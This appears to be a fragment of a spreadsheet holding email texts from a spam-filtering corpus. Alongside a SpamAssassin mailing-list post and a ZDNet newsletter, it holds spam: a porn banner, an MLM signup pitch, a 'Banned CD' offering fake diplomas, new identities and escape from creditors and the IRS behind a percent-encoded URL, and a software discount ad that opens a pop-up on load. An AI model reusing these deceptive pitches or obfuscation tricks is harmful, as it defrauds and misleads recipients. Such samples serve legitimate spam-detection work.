border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;TD&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_04.gif WIDTH=107 HEIGHT=231 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD COLSPAN=3&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_05.gif WIDTH=550 HEIGHT=57 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;strong&gt;&lt;font color=#FFFF00 size=5 face="Geneva, Arial, Helvetica, san-serif"&gt;INSTANT ACCESS... 100% FREE HARDCORE&lt;/font&gt;&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;div align=center&gt;&lt;font face="Times New Roman, Times, serif" size=1 color=#710000&gt;Note: If you would would like to be removed from our list, please reply to this email with the word REMOVE as the subject&lt;/font&gt;&lt;/div&gt;&lt;/center&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/HTML&gt;
 78l95
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Congratulations on Your 6 New Signups
</t>
  </si>
  <si>
    <t xml:space="preserve">We guarantee you signups before you ever pay
 a penny!  We will show you the green before you
 ever take out your wallet.  Sign up for FREE and 
 test drive our system.  No Obligation whatsoever.  
 No Time Limit on the test drive. Our system is so 
 powerful that the system enrolled over 400 people 
 into my downline the first week.
 To get signed up for FREE and take a test drive use 
 the link:
 mailto:workinathome@btamail.net.cn?subject=more_MOSS4_info_please
 Be sure to request info if the subject line does not! 
 The national attention drawn by this program 
 will drive this program with incredible momentum! 
 Don't wait, if you wait, the next 400 people will 
 be above you.
 Take your FREE test drive and have the next 400  
 below you!
 mailto:workinathome@btamail.net.cn?subject=more_MOSS4_info_please
 Be sure to request info if the subject line does not! 
 All the best,
 Daniel
 Financially Independent Home Business Owner
 ______________________________________________________
 To be excluded from future notices:
 mailto:guaranteed4u@btamail.net.cn?subject=exclude  
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BANNED CD! BANNED CD!
</t>
  </si>
  <si>
    <t xml:space="preserve">*****************BANNEDCD::::::::::::::::::::::::::::::::::&gt;NET******************
 I have been receiving emails saying that I'm contributing to the "moral decay of society" by selling the Banned CD.  That may be, but I feel strongly that you have a right to benefit from 
 this hard-to-find information. 
 So I am giving you ONE LAST CHANCE to order the Banned CD! 
 With this powerful CD, you will be able to investigate your friends, enemies and lovers in just minutes using the Internet.  You can track down old flames from college, or you can dig up some dirt on your boss to make sure you get that next promotion! 
 Or maybe you want a fake diploma to hang on your bedroom wall.  You'll find addresses for companies that make these diplomas on the Banned CD. 
 Need to disappear fast and never look back?  No problem! 
 Using the Banned CD, you will learn how to build a completely 
 new identity. 
 Obviously, the Powers That Be don't want you to have the Banned CD.  They have threatened me with lawsuits, fines, and even imprisonment unless I stop selling it immediately. But I feel that YOU have a Constitutional right to access this type of information, and I can't be intimidated. 
  Uncle Sam and your creditors are horrified that I am still selling this product!  There must be a price on my head! 
 Why are they so upset? Because this CD gives you freedom. 
 And you can't buy freedom at your local Walmart.  You will 
 have the freedom to avoid creditors, judgments, lawsuits, IRS 
 tax collectors, criminal indictments, your greedy ex-wife or 
 ex-husband, and MUCH more!
 Please Click the URL for the Detail! 
 http://%77%77%77%2E%62a%6E%6E%65%64c%64%2E%6E%65%74
 {%RAND%}
 You are receiving this special offer because you have provided permission to receive third party email communications regarding special online promotions or offers. We strongly oppose the use of SPAM email and do not want to send our mailings to anyone who does not wish to receive them. If you do not wish to receive any further messages from netcommission. To Be Removed From Our List, 
 http://%77%77%77%2E%62a%6E%6E%65%64c%64%2E%6E%65%74/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Thought for RPM/deb/etc packagers
</t>
  </si>
  <si>
    <t xml:space="preserve">BTW, I've been thinking a little about the RPMs and other packages.
 Already the PLD guys are distributing 3 rpms:
   - perl-Mail-SpamAssassin
           the perl modules.
   - spamassassin
           the "spamassassin" and "spamd" scripts,
           spamd rc-file etc.
   - spamassassin-tools
           mass-check, masses directory stuff, etc.
           for generating rescore data from corpora.
 This seems like a good way to do it; this way, stuff which just needs
 the perl modules doesn't need to require the full RPM be installed,
 with RC files in init.d etc.
 It's been adopted in the distributed .spec file, anyway.
 Theo, BTW, what's the eval test you add in the tvd version of the RPM?
 --j.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</si>
  <si>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Where TabletPC will succeed (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdiyTdfwrXydit0M-0OvrR"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href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dMyjcSC41H99K8FZuSiR"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17, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;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&lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1GRNYYobHCu4jNix1DPPR" &gt;
 &lt;b&gt;Where TabletPC will succeed--and why&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 OK, OK, you readers were right all along. I now believe that Microsoft"s TabletPC can be a big hit. Where? Vertical markets. Why? Development tools.
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XVjSr3AAwQ4lAUw-5WnR" &gt;
 	 &lt;b&gt;Why you won't be buying one from Dell&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=00-4FQlI9QkZj6QEHRbgi4cHr7W6TiR" &gt;CERT: Security reports multiplying&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck2jxbKM_AV-hDEc2lRbPR" &gt;Microsoft squashes Windows 2000 bugs
 &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPMzgGOfNabman8WccrYnR" &gt;Sun's ID software gets a Liberty face-lift
 &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSI0sByYHcoh57BymNzeR" &gt;Mobile slump puts the bite on Bluetooth&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA72_Wa-u0O9U4lR0vdksR" &gt;'Rainbow' coalition to spread wireless
 &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=69-CY-iIoWgaOiklWFMoAH4OpRzLxFR" &gt;Handspring courts corporate buyers&lt;/a&gt;&lt;br&gt;
  &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7e-XDXeInptF7BbTQwi6pURwMpopr9R" &gt;Apple patches serious security hole&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ3V2anHjcTYjvQ8Rgn5rR"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src="http://image.com.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Slowing sales shrinking Intel workforce&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Intel announced lower-than-expected earnings yesterday and that &lt;b&gt;4,000 jobs&lt;/b&gt; (5 percent of its staff) would be eliminated this year. This may bring Intel's margins back in line, but the overall &lt;b&gt;outlook is not bright&lt;/b&gt; in the coming months, despite Federal Reserve Chairman Alan Greenspan's optimism about a more timely recovery.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUxnPyb8eOz2JQZv91zVMlR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 2--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;VMware ups consolidation ante&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The new version of VMware's lower-end server product is slated to run atop the latest versions of Linux  from SuSE, 
 MandrakeSoft and Red Hat, as well as Microsoft Windows .Net Server due this year. Offering more Intel-server based 
 &lt;b&gt;consolidation opportunities&lt;/b&gt; than ever, &lt;b&gt;GSX Server 2.0&lt;/b&gt; includes support for AMD's &lt;b&gt;Athlon XP&lt;/b&gt; and &lt;b&gt;Intel's Xeon&lt;/b&gt; 
 processors.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpTplAy-_pbnY9y52GfwH4R" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBLbx02K74p01K7fy3rR" &gt;
 &lt;b&gt;Server consolidation eases system management&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 3 --&gt;
   &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071602techsupport.gif" width="220" height="280" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;
   &lt;b&gt;Software contracts: Clause for alarm&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In the high-stakes game of corporate software negotiations, the silver-tongued sales rep isn't your biggest challenge: It's 
 the &lt;b&gt;language in the contracts&lt;/b&gt;. Enterprise customers spend surprisingly little time pouring over the fine print of 
 multi-million dollar software contracts that are rife with obscure terminology, vague expansion charges, and &lt;b&gt;mind-boggling 
 license conversions&lt;/b&gt;. As a result, they end up paying in ways they had never imagined long after the deal is signed. Just 
 ask California.
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8UQHPf6FrAP_kMFIM55iR" &gt;
 &lt;b&gt;Read the fine print&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 4 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Six steps to the best TCO with Linux&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Don't just bring in Linux as yet another OS to manage. To help you determine whether Linux offers better TCO than Windows, 
 &lt;b&gt;Gartner&lt;/b&gt; examines the benefits and pitfalls of deploying Linux-based servers.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1rPKVr_O_Iti64Q9t8PR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/bobrien.gif" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Rack server a la mode&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 With its Xserve rack-mount server, &lt;b&gt;Apple is moving into enterprise territory&lt;/b&gt;. The specs are impressive: Dual 1GHz 
 PowerPC G4s, up to 2GB DDR SDRAM, two 64-bit 66MHz PCI slots (plus a third combination PCI/AGP slot), dual Gigabit Ethernet, 
 FireWire and USB ports, and four Ultra ATA/100 Apple Drive Module bays. But &lt;b&gt;Bill O'Brien&lt;/b&gt; thinks Apple's 
 &lt;b&gt;licensing&lt;/b&gt; may be even more appealing than the hardware.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYrs-Xbl-pEvKY-qkCKnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 6--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071602winbook.jpg" width="220" height="207" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;A notebook with desktop muscle&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;b&gt;WinBook's&lt;/b&gt; big and heavy J4 uses a desktop Pentium 4 and leaves mobile P4-M notebooks in the dust. That means heavy 
 lifting for your spreadsheets--and your shoulders. If you travel only occasionally and need &lt;b&gt;top performance&lt;/b&gt;, this 
 might be the sole computer for you. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9uKdFFSkMRUVolYrBeR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=3d-oi9NIbz4YT_04JZvwlGWUTnaNtPR"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href="http://clickthru.online.com/Click?q=52-LUXoIrJtd9bPZtsMWz8AtIQwjjnR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqyXkspcWhKPAKa1CPIuR" &gt;
 &lt;b&gt;Top 10 Web services security requirements&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Security is a critical, yet often overlooked, aspect of &lt;b&gt;Web services development&lt;/b&gt;. Consider these requirements when 
 working with your next project. 
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;DOWNLOADS&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWcc3qxBXpfLHDx1984BOsR" &gt;
 &lt;b&gt;Stamp out the bugs&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Does your code need a once-over? &lt;b&gt;Debug your software&lt;/b&gt; with this collection of tools and utilities designed to locate 
 and correct programming mistakes, track defects, and more.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download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href="http://clickthru.online.com/Click?q=91-EZnpQAzyNQDpaaRMzb-Byo4hJdlR" &gt;
 &lt;b&gt;Bridging the gap between Liberty and Microsoft&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It appears that we are closer to a &lt;b&gt;solution for single sign-on&lt;/b&gt;. But what if Microsoft chooses not to support Liberty's specifications?
 &lt;P&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBWOWNCCaOvAKcnvjbgw4R" &gt;
 &lt;b&gt;Microsoft stresses security for Exchange&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The software giant plans to improve the Exchange Server e-mail system in the software's first &lt;b&gt;major upgrade&lt;/b&gt; in nearly 
 two years.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size="-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZB7w7iTFXRaT-Dc13yE_rR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/040802_monitors.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWF8jxtnLB7c7YuNDxuyCiR" style="text-decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
 Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwyqDK1PMPRXGugH6NQYvU4R" style="text-decoration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Monitors&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=fb-aWErQkgqrbw0XpCoFokcTbTDoVrR" style="text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=10-YU9qI9NwJAr9xI2PffACEH5fCAiR" style="text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=25-inepIbdXXmzA5pDZTscR7jeQrFPR" style="text-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8GBoi87JR1rqAFZcCnR" style="text-decoration:none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81v_yS2S8g-rrsLKFK0uR" style="text-decoration:none"&gt;Samsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZVIMWeNGWF8w6YrPhsR" style="text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=79-rsQHIEBf9Lj-XyVmFz_e0CvgpaFR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTCcMiQPDuYWD0V_Wy4R" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qYDHGeSfQffN5r5ls4rR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXmHB--h8FdMkmoOwzlR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOogUDSP3ufz1Jey2fP4R" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;/b&gt;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href='http://clickthru.online.com/Click?q=e3-zeDWrSVPQAL2bLNCKtDeWAQTvr4_pRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXnX9RFW3piaRL6DCwoliR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGYTC2fNv0T0QkY6b7PR"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href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_cRyT0uo4I9yc99NcnR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4e5TWsMQ93KjZ6eJcneR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbkXLD9yAu7hgvo2AKesR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpOoMainG9TmIKJ15BRdR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpsCMz-fvhx31g9NPmdZPuR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notn6ugXgIiSupcptbPMPR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZx3zN1YxE9R0CGk_HtsonR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxsq9h1Op0NpbnpTbdL3eR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq56N8COW7qeZDozn6f5yR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=e2-J1Dp-XyJ69zYJbNJ-NoBM4w159RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: fwd:  SYSTEMWORKS CLEARANCE SALE_ONLY $29.99
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 	&lt;META NAME=3D"GENERATOR" Content=3D"Visual Page 1.0 for Windows"&gt;
 	&lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;CHARSET=3Diso-8859=
 -1"&gt;
 	&lt;TITLE&gt;untitled&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY onLoad=3D"(window.open('http://euro.specialdiscounts4u.com/'))"&gt;
 &lt;P ALIGN=3D"CENTER"&gt;&lt;FONT COLOR=3D"#0000FF" face=3D"Arial"&gt;&lt;B&gt;ATTENTION: T=
 his is a MUST for ALL Computer Users!!!&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;FONT COLOR=3D"#000000" face=3D"Arial"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT face=3D"Arial"&gt;&lt;B&gt;*NEW-Special Package Deal!*&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;FONT COLOR=3D"#000000" face=3D"Arial"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT COLOR=3D"#FF0000" face=3D"Arial"&gt;&lt;B&gt;Norton SystemWorks 2002 S=
 oftware Suite -Professional Edition-
 Includes Six - Yes 6! - Feature-Packed Utilities
 ALL For 1 Special LOW Price!6 Feature-Packed Utilities...1 Great Price!
 A $300+ Combined Retail Value!
 FREE Shipping!&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
